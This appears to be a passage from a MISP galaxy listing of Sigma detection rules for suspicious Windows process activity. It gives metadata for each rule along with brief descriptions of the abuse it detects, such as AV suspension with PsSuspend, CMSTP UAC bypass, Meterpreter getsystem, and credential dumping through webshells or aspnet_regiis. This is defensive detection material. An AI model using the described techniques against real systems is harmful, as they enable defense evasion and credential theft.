falsepositive ['Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.']
filename proc_creation_win_odbcconf_register_dll_regsvr.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Webshell Hacking Activity Patterns

Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system

Internal MISP references

UUID 4ebc877f-4612-45cb-b3a5-8e3834db36c9 which can be used as unique global reference for Webshell Hacking Activity Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/17
falsepositive ['Unlikely']
filename proc_creation_win_webshell_hacking.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

PowerShell Execution With Potential Decryption Capabilities

Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.

Internal MISP references

UUID 434c08ba-8406-4d15-8b24-782cb071a691 which can be used as unique global reference for PowerShell Execution With Potential Decryption Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Unlikely']
filename proc_creation_win_powershell_decrypt_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

New Generic Credentials Added Via Cmdkey.EXE

Detects usage of "cmdkey.exe" to add generic credentials. As an example, this can be used before connecting to an RDP session via command line interface.

Internal MISP references

UUID b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 which can be used as unique global reference for New Generic Credentials Added Via Cmdkey.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/03
falsepositive ['Legitimate usage for administration purposes']
filename proc_creation_win_cmdkey_adding_generic_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Add SafeBoot Keys Via Reg Utility

Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not

Internal MISP references

UUID d7662ff6-9e97-4596-a61d-9839e32dee8d which can be used as unique global reference for Add SafeBoot Keys Via Reg Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/02
falsepositive ['Unlikely']
filename proc_creation_win_reg_add_safeboot.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

Internal MISP references

UUID 84232095-ecca-4015-b0d7-7726507ee793 which can be used as unique global reference for Suspicious DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certoc_load_dll_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Service DACL Modification Via Set-Service Cmdlet

Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable

Internal MISP references

UUID a95b9b42-1308-4735-a1af-abb1c5e6f5ac which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_service_dacl_modification_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Installation Execution

Detects ScreenConnect program starts that establish a remote access to a system.

Internal MISP references

UUID 75bfe6e6-cd8e-429e-91d3-03921e1d7962 which can be used as unique global reference for Remote Access Tool - ScreenConnect Installation Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/11
falsepositive ['Legitimate use by administrative staff']
filename proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

CobaltStrike Load by Rundll32

Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.

Internal MISP references

UUID ae9c6a7c-9521-42a6-915e-5aaa8689d529 which can be used as unique global reference for CobaltStrike Load by Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021/06/01
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Sysinternals PsSuspend Suspicious Execution

Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses

Internal MISP references

UUID 4beb6ae0-f85b-41e2-8f18-8668abc8af78 which can be used as unique global reference for Sysinternals PsSuspend Suspicious Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/23
falsepositive ['Unlikely']
filename proc_creation_win_sysinternals_pssuspend_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Execution of InstallUtil Without Log

Uses the .NET InstallUtil.exe application in order to execute image without log

Internal MISP references

UUID d042284c-a296-4988-9be5-f424fadcc28c which can be used as unique global reference for Suspicious Execution of InstallUtil Without Log in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/23
falsepositive ['Unknown']
filename proc_creation_win_instalutil_no_log_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Obfuscated Ordinal Call Via Rundll32

Detects execution of "rundll32" with potential obfuscated ordinal calls

Internal MISP references

UUID 43fa5350-db63-4b8f-9a01-789a427074e1 which can be used as unique global reference for Potential Obfuscated Ordinal Call Via Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Unknown']
filename proc_creation_win_rundll32_obfuscated_ordinal_call.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Renamed AdFind Execution

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.

Internal MISP references

UUID df55196f-f105-44d3-a675-e9dfb6cc2f2b which can be used as unique global reference for Renamed AdFind Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/21
falsepositive ['Unknown']
filename proc_creation_win_renamed_adfind.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.002']
Related clusters

To see the related clusters, click here.

WhoAmI as Parameter

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

Internal MISP references

UUID e9142d84-fbe0-401d-ac50-3e519fb00c89 which can be used as unique global reference for WhoAmI as Parameter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/11/29
falsepositive ['Unknown']
filename proc_creation_win_susp_whoami_as_param.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Unusual Parent Process For Cmd.EXE

Detects suspicious parent process for cmd.exe

Internal MISP references

UUID 4b991083-3d0e-44ce-8fc4-b254025d8d4b which can be used as unique global reference for Unusual Parent Process For Cmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/21
falsepositive ['Unknown']
filename proc_creation_win_cmd_unusual_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Meterpreter/CobaltStrike Activity

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting

Internal MISP references

UUID 15619216-e993-4721-b590-4c520615a67d which can be used as unique global reference for Potential Meterpreter/CobaltStrike Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth
creation_date 2019/10/26
falsepositive ['Commandlines containing components like cmd accidentally', 'Jobs and services started with cmd']
filename proc_creation_win_hktl_meterpreter_getsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - Anydesk Execution From Suspicious Folder

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 065b00ca-5d5c-4557-ac95-64a6d0b64d86 which can be used as unique global reference for Remote Access Tool - Anydesk Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/20
falsepositive ['Legitimate use of AnyDesk from a non-standard folder']
filename proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Disabled Volume Snapshots

Detects commands that temporarily turn off Volume Snapshots

Internal MISP references

UUID dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a which can be used as unique global reference for Disabled Volume Snapshots in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/28
falsepositive ['Legitimate administration']
filename proc_creation_win_reg_volsnap_disable.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Microsoft IIS Connection Strings Decryption

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.

Internal MISP references

UUID 97dbf6e2-e436-44d8-abee-4261b24d3e41 which can be used as unique global reference for Microsoft IIS Connection Strings Decryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/28
falsepositive ['Unknown']
filename proc_creation_win_iis_connection_strings_decryption.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Dumping Process via Sqldumper.exe

Detects process dump via legitimate sqldumper.exe binary

Internal MISP references

UUID 23ceaf5c-b6f1-4a32-8559-f2ff734be516 which can be used as unique global reference for Dumping Process via Sqldumper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Kirill Kiryanov, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate MSSQL Server actions']
filename proc_creation_win_lolbin_susp_sqldumper_activity.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Use Icacls to Hide File to Everyone

Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files

Internal MISP references

UUID 4ae81040-fc1c-4249-bfa3-938d260214d9 which can be used as unique global reference for Use Icacls to Hide File to Everyone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/18
falsepositive ['Legitimate use']
filename proc_creation_win_icacls_deny.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Obfuscated IP Via CLI

Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line

Internal MISP references

UUID 56d19cb4-6414-4769-9644-1ed35ffbb148 which can be used as unique global reference for Obfuscated IP Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename proc_creation_win_susp_obfuscated_ip_via_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

Query Usage To Exfil Data

Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use

Internal MISP references

UUID 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 which can be used as unique global reference for Query Usage To Exfil Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unknown']
filename proc_creation_win_query_session_exfil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Wusa.EXE Extracting Cab Files From Suspicious Paths

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths

Internal MISP references

UUID c74c0390-3e20-41fd-a69a-128f0275a5ea which can be used as unique global reference for Wusa.EXE Extracting Cab Files From Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unknown']
filename proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

SyncAppvPublishingServer Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.

Internal MISP references

UUID fbd7c32d-db2a-4418-b92c-566eb8911133 which can be used as unique global reference for SyncAppvPublishingServer Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/12
falsepositive ['App-V clients']
filename proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Stop Windows Service Via Sc.EXE

Detects the stopping of a Windows service via the "sc.exe" utility

Internal MISP references

UUID 81bcb81b-5b1f-474b-b373-52c871aaa7b1 which can be used as unique global reference for Stop Windows Service Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behavior in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_sc_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Use of Wfc.exe

The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.

Internal MISP references

UUID 49be8799-7b4d-4fda-ad23-cafbefdebbc5 which can be used as unique global reference for Use of Wfc.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
creation_date 2022/06/01
falsepositive ['Legitimate use by a software developer']
filename proc_creation_win_lolbin_wfc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious SysAidServer Child

Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)

Internal MISP references

UUID 60bfeac3-0d35-4302-8efb-1dd16f715bc6 which can be used as unique global reference for Suspicious SysAidServer Child in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unknown']
filename proc_creation_win_java_sysaidserver_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Whoami.EXE Execution Anomaly

Detects the execution of whoami.exe with suspicious parent processes.

Internal MISP references

UUID 8de1cbe8-d6f5-496d-8237-5f44a721c7a0 which can be used as unique global reference for Whoami.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/12
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_whoami_parent_anomaly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

HackTool - SharpChisel Execution

Detects usage of the Sharp Chisel via the commandline arguments

Internal MISP references

UUID cf93e05e-d798-4d9e-b522-b0248dc61eaf which can be used as unique global reference for HackTool - SharpChisel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/05
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sharp_chisel.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Suspicious GUP Usage

Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks

Internal MISP references

UUID 0a4f6091-223b-41f6-8743-f322ec84930b which can be used as unique global reference for Suspicious GUP Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/02/06
falsepositive ['Execution of tools named GUP.exe and located in folders different than Notepad++\updater']
filename proc_creation_win_gup_suspicious_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of DiskShadow.EXE

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

Internal MISP references

UUID 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 which can be used as unique global reference for Potentially Suspicious Child Process Of DiskShadow.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications']
filename proc_creation_win_diskshadow_child_process_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - Ngrok Execution

Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.

Internal MISP references

UUID ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31 which can be used as unique global reference for PUA - Ngrok Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/14
falsepositive ['Another tool that uses the command line switches of Ngrok', 'Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)']
filename proc_creation_win_pua_ngrok.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Gpscript Execution

Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy

Internal MISP references

UUID 1e59c230-6670-45bf-83b0-98903780607e which can be used as unique global reference for Gpscript Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Legitimate uses of logon scripts distributed via group policy']
filename proc_creation_win_lolbin_gpscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Phishing Pattern ISO in Archive

Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)

Internal MISP references

UUID fcdf69e5-a3d3-452a-9724-26f2308bf2b1 which can be used as unique global reference for Phishing Pattern ISO in Archive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/07
falsepositive ['Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction']
filename proc_creation_win_susp_archiver_iso_phishing.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566']
Related clusters

To see the related clusters, click here.

Potential Recon Activity Via Nltest.EXE

Detects nltest commands that can be used for information discovery

Internal MISP references

UUID 5cc90652-4cbd-4241-aa3b-4b462fa5a248 which can be used as unique global reference for Potential Recon Activity Via Nltest.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Craig Young, oscd.community, Georg Lauenstein
creation_date 2021/07/24
falsepositive ['Legitimate administration use but user and host must be investigated']
filename proc_creation_win_nltest_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1016', 'attack.t1482']
Related clusters

To see the related clusters, click here.

CMSTP UAC Bypass via COM Object Access

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

Internal MISP references

UUID 4b60e6f2-bf39-47b4-b4ea-398e33cfe253 which can be used as unique global reference for CMSTP UAC Bypass via COM Object Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman, Christian Burkard (Nextron Systems)
creation_date 2019/07/31
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_creation_win_uac_bypass_cmstp_com_object_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

CMSTP Execution Process Creation

Detects various indicators of Microsoft Connection Manager Profile Installer execution

Internal MISP references

UUID 7d4cdc5a-0076-40ca-aac8-f7e714570e47 which can be used as unique global reference for CMSTP Execution Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nik Seetharaman
creation_date 2018/07/16
falsepositive ['Legitimate CMSTP use (unlikely in modern enterprise environments)']
filename proc_creation_win_cmstp_execution_by_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.003', 'attack.g0069', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Arbitrary Command Execution Using WSL

Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands

Internal MISP references

UUID dec44ca7-61ad-493c-bfd7-8819c5faa09b which can be used as unique global reference for Arbitrary Command Execution Using WSL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Automation and orchestration scripts may use this method to execute scripts etc.', 'Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)']
filename proc_creation_win_wsl_lolbin_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Malicious Base64 Encoded PowerShell Keywords in Command Lines

Detects base64 encoded strings used in hidden malicious PowerShell command lines

Internal MISP references

UUID f26c6093-6f14-4b12-800f-0fcb46f5ffd0 which can be used as unique global reference for Malicious Base64 Encoded PowerShell Keywords in Command Lines in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author John Lambert (rule)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_hidden_flag.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Product Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

Internal MISP references

UUID 15434e33-5027-4914-88d5-3d4145ec25a9 which can be used as unique global reference for Potential Product Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_product.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious XOR Encoded PowerShell Command

Detects presence of a potentially xor encoded powershell command

Internal MISP references

UUID bb780e0c-16cf-4383-8383-1e5471db6cf9 which can be used as unique global reference for Suspicious XOR Encoded PowerShell Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
creation_date 2018/09/05
falsepositive ['Unknown']
filename proc_creation_win_powershell_xor_commandline.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1140', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Shells Spawn by Java Utility Keytool

Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)

Internal MISP references

UUID 90fb5e62-ca1f-4e22-b42e-cc521874c938 which can be used as unique global reference for Suspicious Shells Spawn by Java Utility Keytool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/12/22
falsepositive ['Unknown']
filename proc_creation_win_java_keytool_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Remote PowerShell Session Host Process (WinRM)

Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).

Internal MISP references

UUID 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 which can be used as unique global reference for Remote PowerShell Session Host Process (WinRM) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate usage of remote Powershell, e.g. for monitoring purposes.']
filename proc_creation_win_winrm_remote_powershell_session_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

HackTool - XORDump Execution

Detects suspicious use of XORDump process memory dumping utility

Internal MISP references

UUID 66e563f9-1cbd-4a22-a957-d8b7c0f44372 which can be used as unique global reference for HackTool - XORDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/28
falsepositive ['Another tool that uses the command line switches of XORdump']
filename proc_creation_win_hktl_xordump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE

Detects active directory enumeration activity using known AdFind CLI flags

Internal MISP references

UUID 455b9d50-15a1-4b99-853f-8d37655a4c1b which can be used as unique global reference for PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Authorized administrative activity']
filename proc_creation_win_pua_adfind_enumeration.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

PDQ Deploy Remote Adminstartion Tool Execution

Detect use of PDQ Deploy remote admin tool

Internal MISP references

UUID d679950c-abb7-43a6-80fb-2a480c4fc450 which can be used as unique global reference for PDQ Deploy Remote Adminstartion Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Legitimate use']
filename proc_creation_win_pdqdeploy_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1072']
Related clusters

To see the related clusters, click here.

Proxy Execution Via Wuauclt.EXE

Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.

Internal MISP references

UUID af77cf95-c469-471c-b6a0-946c685c4798 which can be used as unique global reference for Proxy Execution Via Wuauclt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_dll_loading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']
Related clusters

To see the related clusters, click here.

WMI Persistence - Script Event Consumer

